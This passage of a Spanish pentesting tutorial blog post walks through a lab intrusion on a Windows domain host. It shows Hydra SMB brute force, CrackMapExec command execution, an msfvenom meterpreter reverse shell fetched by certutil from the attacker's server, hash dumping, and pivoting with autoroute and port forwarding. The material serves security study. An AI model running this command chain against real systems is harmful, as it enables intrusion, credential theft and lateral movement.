        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>nano user.txt
    admin
    administrator
    Guest
    root

hydra <span class="nt">-L</span> user.txt <span class="nt">-P</span> /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt dominio.local smb
</pre></td></tr></tbody></table></code></div></div>
<p>Con el comando anterior, se descubre las siguientes credenciales:</p>

<p><a href="/assets/img/Primer-Blog/hydra.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/hydra.png" alt="Hydra" loading="lazy"></a>
<em>Hydra</em></p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1
</pre></td></tr></tbody></table></code></div></div>
<p>Con crackmapexec podemos saber si nos podemos conectar al equipo utilizando las credenciales descubiertas con hydra, esto lo sabemos si nos devuelve un <strong>(Pwn3d!)</strong>.</p>

<p><a href="/assets/img/Primer-Blog/crackmapexec.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/crackmapexec.png" alt="Crackmapexec" loading="lazy"></a>
<em>Crackmapexec</em></p>

<p>Ahora procedemos a ejecutar un comando de sistema, para saber qué sistema y arquitectura está corriendo el sistema.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1 <span class="nt">-x</span> <span class="s1">'systeminfo'</span>
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/Primer-Blog/systeminfo.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/systeminfo.png" alt="Systeminfo" loading="lazy"></a>
<em>Crackmapexec_Systeminfo</em></p>

<p>Luego de haber obtenido o recopilado la información necesaria, se procede a ejecutar un payload o un revershell en modo escucha, para ello nos apoyamos de multi/handles de msfconsole.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>msfconsole <span class="nt">-q</span>
use exploit/multi/handler
<span class="nb">set </span>lhost 10.10.50.6
<span class="nb">set </span>lport 9001
<span class="nb">set </span>payload windows/x64/meterpreter/reverse_tcp
run
</pre></td></tr></tbody></table></code></div></div>
<p>En LHost se debe poner nuestra dirección ip que tiene conexión IP con la máquina víctima.</p>

<p>El paylod está conformado de la siguiente manera:
    * Windows: Es para el sistema operativo que deseamos atacar.
    * x64: Es la arquitectura que tiene el sistema.
    * meterpreter: Genera una shell para msfconsole.
    * reverse_tcp: Revershell de tipo tcp.</p>

<p>En otra terminal se procede a generar el payload para la máquina víctima.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>msfvenom <span class="nt">-p</span> windows/x64/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span>10.10.50.6 <span class="nv">LPORT</span><span class="o">=</span>9001 <span class="nt">-f</span> exe <span class="nt">-o</span> cualquiercosa.exe
</pre></td></tr></tbody></table></code></div></div>
<p>Donde:
    * -f: permite generar la exetensión del archivo
    * -o: permite generar el nombre del archivo</p>

<p>Al ejecutar el paylod en la máquina víctima, se procede a generar una sesión en msfconsole que quedó en modo escucha.</p>

<p>Para subir el payload al equipo se genera un servidor http mediante python:</p>
<div class="language-python highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">python3</span> <span class="o">-</span><span class="n">m</span> <span class="n">http</span><span class="p">.</span><span class="n">server</span> <span class="mi">80</span>
</pre></td></tr></tbody></table></code></div></div>
<p>Para descargar el payload se ejecuta el código con crackmapexec como lo probamos anteriormente.</p>
<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1 <span class="nt">-x</span> <span class="s1">'certutil.exe -f -split -urlcache:10.10.50.6/cualquiercosa.exe zzz.exe'</span> 
crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1 <span class="nt">-x</span> <span class="s1">'dir'</span>
crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1 <span class="nt">-x</span> <span class="s1">'cd'</span> 
crackmapexec smb dominio.local <span class="nt">-u</span> administrator <span class="nt">-p</span> password1 <span class="nt">-x</span> <span class="s1">'c:\Windows\system32\zzz.exe'</span> 
</pre></td></tr></tbody></table></code></div></div>

<ul>
  <li>Con dir se puede comprobar que el archivo se subió a la máquina víctima.</li>
  <li>Con cd permite saber la ruta exacta en la que nos encontramos en el sistema.</li>
  <li>Para ejecutar el payload generado, se puede hacer mediante el último comando apuntando al archivo almacenado en la máquina.</li>
</ul>

<p><a href="/assets/img/Primer-Blog/certutil.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/certutil.png" alt="Crackmapexec con Certutil" loading="lazy"></a>
<em>Crackmapexec con Certutil</em></p>

<p>Si todo se realizó correctamente, se abre la shell de tipo meterpreter que se dejó anteriormente ejecutando en modo escucha.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
</pre></td><td class="rouge-code"><pre>getuid
    Server username: NT AUTHORITY<span class="se">\S</span>YSTEM
hashdump
    admin:hash
    Administrator:hash
    Guest:hash
    root:hash

shell
    ping 10.4.25.90 <span class="c">#Segunda ip obtenida al inicio</span>
        <span class="c">#Successfull</span>
    ipconfig
        Sunet Mask: 255.255.240.0 <span class="c">#Con eso sabemos que es /20</span>
    ctrl + Z -&gt; Backgroud
ctrl + Z -&gt; Backgroud

sessions <span class="c">#Para saber las sesiones activas</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="pivoting-con-metasploit"><span class="me-2">Pivoting con MetaSploit</span><a href="#pivoting-con-metasploit" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Ahora procederemos dentro de la misma msfconsole anterior con un módulo de post-explotación ya que es pivoting. El módulo a ocupar es autorute, el cuál permite agregar rutas que van a permitir llegar a otro equipo el cuál no es accesible.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
</pre></td><td class="rouge-code"><pre>use /post/multi/manage/autoroute
show options
    netmask: 255.255.255.0
<span class="nb">set </span>netmask: 255.255.240.0
<span class="nb">set </span>session 1
<span class="nb">set </span>subnet 10.4.25.90/24 <span class="c">#Ip del equipo que queremos llegar</span>
run
    Route added to subnet 10.4.16.0/255.255.240.0 from Host<span class="s1">'s routing table.
</span></pre></td></tr></tbody></table></code></div></div>

<p>Con eso se agrega la ruta porque sabemos la ip destino que es dominio1.local. <strong>En caso de no saber cuál es el equipo al que queremos llegar se procede de la siguiente manera aunque para este laboratorio no aplica</strong>.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>use post/windows/gather/arp_scanner
<span class="nb">set </span>session 1
<span class="nb">set </span>rhost 10.4.16.0/20
run

use auxiliary/scanner/portscan/tcp
<span class="nb">set </span>rhost 10.4.16.0/20
<span class="nb">set </span>ports 445
<span class="nb">set </span>threads 10 <span class="c">#No se recomienda poner más de 10</span>
run

<span class="nb">set </span>rhost 10.4.25.90 <span class="c">#Porque ya conocemos la ip destino</span>
run
    10.4.25.90  10.4.25.90:445 - TCP OPEN
</pre></td></tr></tbody></table></code></div></div>

<p>Con este módulos nos enumera los host activos en esa red y analizamos los puertos abiertos de cada host.</p>

<p><a href="/assets/img/Primer-Blog/arp_scanner.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/arp_scanner.png" alt="ARP Scanner" loading="lazy"></a>
<em>ARP Scanner</em></p>

<p>Al encontrar los puertos que queremos explotar abiertos, se procede a hacer una reedirección de puertos con <strong>Port Forwarding</strong>.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>sessions 1

meterpreter&gt; portfwd add <span class="nt">-l</span> 445 <span class="nt">-p</span> 445 <span class="nt">-r</span> 10.4.25.90
</pre></td></tr></tbody></table></code></div></div>
<p>portfwd: crear listener en el puerto del atacante 445 y redirige el tráfico a través de la sesión meterpreter.
-l: Equipo local de mi kali y se puede poner en cualquier puerto.
-p: En qué puerto del equipo remoto
-r: La ip del equipo pivoting</p>

<p>Para probar que ahora desde mi equipo puedo acceder a ese puerto y a esa ip, se procede con el siguiente comando:</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>lsof <span class="nt">-i</span>:445
</pre></td></tr></tbody></table></code></div></div>
<p><a href="/assets/img/Primer-Blog/lsof.png" class="popup img-link shimmer"><img src="/assets/img/Primer-Blog/lsof.png" alt="LSOFT Conexión establecida" loading="lazy"></a>
<em>Conexión establecida</em></p>

<p>Ahora si yo quiero hacer un ping a dominio1.local, me va a seguir dando error ya que no tengo la ruta directa de llegar.</p>

<div class="language-shell highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="¡Copiado!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre>smbclient <span class="nt">-L</span> 127.0.0.1 <span class="nt">-N</span>
smbclient <span class="nt">-L</span> 127.0.0.1 <span class="nt">-U</span> administrator
smbclient //127.0.0.1/Documents <span class="nt">-U</span> administrator
    <span class="o">&gt;</span> <span class="nb">ls</span>
</pre></td></tr></tbody></table></code></div></div>

<p>Con el segundo smbclient se lista los recursos compartidos del dominio1.local que no teníamos acceso.</p>

<blockquote class="prompt-warning">
  <p>Nota: Los recursos compartidos que tienen el <strong>$</strong> no son muy importantes, se debe acceder a los que no tienen ese símbolo.</p>
</blockquote>

<h2 id="fixing-exploits"><span class="me-2">Fixing Exploits.</span><a href="#fixing-exploits" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>En este laboratorio se encuentra un exploit público.
Video 02:06</p>

  </div>

  <div class="mt-5">
    <script src="https://giscus.app/client.js"
            data-repo="Balo93/balo93.github.io"
            data-repo-id="R_kgDOPnn18A"
            data-category="General"
            data-category-id="DIC_kwDOPnn18M4C0VSq"
            data-mapping="pathname"
            data-strict="0"
            data-reactions-enabled="1"
            data-emit-metadata="0"
            data-input-position="bottom"
            data-theme="preferred_color_scheme"
            data-lang="es"
            crossorigin="anonymous"
            async>
    </script>
  </div>

  <div class="post-tail-wrapper text-muted">
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/hacking/">Hacking</a>,
          <a href="/categories/vulnerabilidades/">Vulnerabilidades</a>,
          <a href="/categories/explotaci%C3%B3n/">Explotación</a>
      </div>
    

    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a href="/tags/shellshock/" class="post-tag no-text-decoration">shellshock</a>
        
          <a href="/tags/metasploit/" class="post-tag no-text-decoration">Metasploit</a>
        
          <a href="/tags/privesc/" class="post-tag no-text-decoration">privesc</a>
        
          <a href="/tags/webdav/" class="post-tag no-text-decoration">webdav</a>
        
          <a href="/tags/cracking/" class="post-tag no-text-decoration">cracking</a>
        
          <a href="/tags/kiwi/" class="post-tag no-text-decoration">kiwi</a>
        
          <a href="/tags/incognito/" class="post-tag no-text-decoration">incognito</a>
        
          <a href="/tags/powersploit/" class="post-tag no-text-decoration">powersploit</a>
        
          <a href="/tags/john/" class="post-tag no-text-decoration">john</a>
        
      </div>
    

    <div class="post-tail-bottom d-flex justify-content-between align-items-center mt-5 pb-2">
      <div class="license-wrapper">
        
          
          Esta entrada está licenciada bajo 
            <a href="https://creativecommons.org/licenses/by/4.0/">
              CC BY 4.0
            </a>
           por el autor.
        
      </div>
      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Compartir</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Explotaci%C3%B3n%20y%20Post%20Explotaci%C3%B3n%20-%20CyberBalo&url=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fexplotacion-y-post-explotacion%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Explotaci%C3%B3n%20y%20Post%20Explotaci%C3%B3n%20-%20CyberBalo&u=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fexplotacion-y-post-explotacion%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fbalo93.github.io%2Fposts%2Fexplotacion-y-post-explotacion%2F&text=Explotaci%C3%B3n%20y%20Post%20Explotaci%C3%B3n%20-%20CyberBalo" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copiar enlace"
      data-title-succeed="¡Enlace copiado!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
  </div>
</article>

            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Actualizado recientemente</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Recomendaciones-ejpt/">Recomendaciones eJPT</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/explotacion-y-post-explotacion/">Explotación y Post Explotación</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/laboratorios/">Resolución de Laboratorios</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/reconocimiento-pasivo/">Reconocimiento Pasivo: El Arte de Investigar sin ser Visto</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/reconocimiento-activo/">Reconocimiento Activo: El Arte de Investigar</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Etiquetas populares</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">Metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-etico/">hacking-etico</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeraci%C3%B3n/">enumeración</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hydra-y-crackmapexec/">Hydra y CrackMapExec</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/incognito/">incognito</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/kiwi/">kiwi</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/nmap/">Nmap</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
    </div>
  </section>


            </div>

            
              
              






  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contenido</h2>
    <nav id="toc"></nav>
  </section>


            
          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->


<!-- An random integer that bigger than 0 -->


<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->















  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  

  
    










  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Lecturas adicionales</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/analisis-vuln-enum/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1774737540"
  data-df="DD/MM/YYYY"
  
>
  28/03/2026
</time>

              <h4 class="pt-0 my-2">Análsis de Vulnerabilidades y Explotación</h4>
              <div class="text-muted">
                <p>Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/enum-crack-pass/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1771191900"
  data-df="DD/MM/YYYY"
  
>
  15/02/2026
</time>

              <h4 class="pt-0 my-2">Enumeración - Cracking de contraseñas</h4>
              <div class="text-muted">
                <p>Cómo enumerar usuarios y crackear contraseñas de servicios vulnerables.</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/laboratorios/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->




<time
  
  data-ts="1776224340"
  data-df="DD/MM/YYYY"
  
>
  14/04/2026
</time>

              <h4 class="pt-0 my-2">Resolución de Laboratorios</h4>
              <div class="text-muted">
                <p>Laboratorios.</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->


            
              
              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
  

  
    <a
      href="/posts/laboratorios/"
      class="btn btn-outline-primary"
      aria-label="Anterior"
    >
      <p>Resolución de Laboratorios</p>
    </a>
  

  
    <div class="btn btn-outline-primary disabled" aria-label="Nuevo">
      <p>-</p>
    </div>
  
</nav>

            

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2026</time>

    
      <a href="https://twitter.com/alvarogbalo">Alvaro Gavilanes</a>.
    

    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Salvo que se indique explícitamente, las entradas de este blog están licenciadas bajo la Creative Commons Attribution 4.0 International (CC BY 4.0) License por el autor."
      >Algunos derechos reservados.</span>
    
  </p>

  <p>Hecho con <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> usando el tema <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.3.1"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a>
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
      
        
        



  <section>
    <h2 class="panel-heading">Etiquetas populares</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/cracking/">cracking</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/metasploit/">Metasploit</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hacking-etico/">hacking-etico</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/enumeraci%C3%B3n/">enumeración</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/hydra-y-crackmapexec/">Hydra y CrackMapExec</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/incognito/">incognito</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/john/">john</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/kiwi/">kiwi</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/nmap/">Nmap</a>
      
        
        <a class="post-tag btn btn-outline-primary" href="/tags/osint/">osint</a>
      
    </div>
  </section>


    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

    
      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">Hay una nueva versión de contenido disponible.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Actualizar
    </button>
  </div>
</aside>

    

    <!-- Embedded scripts -->

    
      
      <!-- The comments switcher -->


    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{content}</p>  </article>',
      noResultsText: '<p class="mt-5">¡Oops! No se encuentran resultados.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>

